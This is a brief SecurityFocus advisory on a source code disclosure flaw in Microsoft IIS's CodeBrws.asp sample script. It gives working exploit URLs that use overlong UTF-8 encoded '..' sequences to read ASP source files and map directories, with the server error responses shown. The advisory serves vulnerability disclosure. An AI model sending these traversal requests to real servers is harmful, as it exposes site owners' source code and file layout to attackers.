Microsoft IIS CodeBrws.ASP Source Code Disclosure Vulnerability

This vulnerability may be exploited with a web browser. The following example is provided:

http://target/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp

The following example was also provided to demonstrate that the directory structure may be mapped out using this vulnerability:

Request:
http://target/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp

Response: Microsoft VBScript runtime (0x800A004C) Path not found

Request:
http://target/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/oracle/nonexistant.asp

Response: Microsoft VBScript runtime (0x800A0035) File not found


 

Privacy Statement
Copyright 2010, SecurityFocus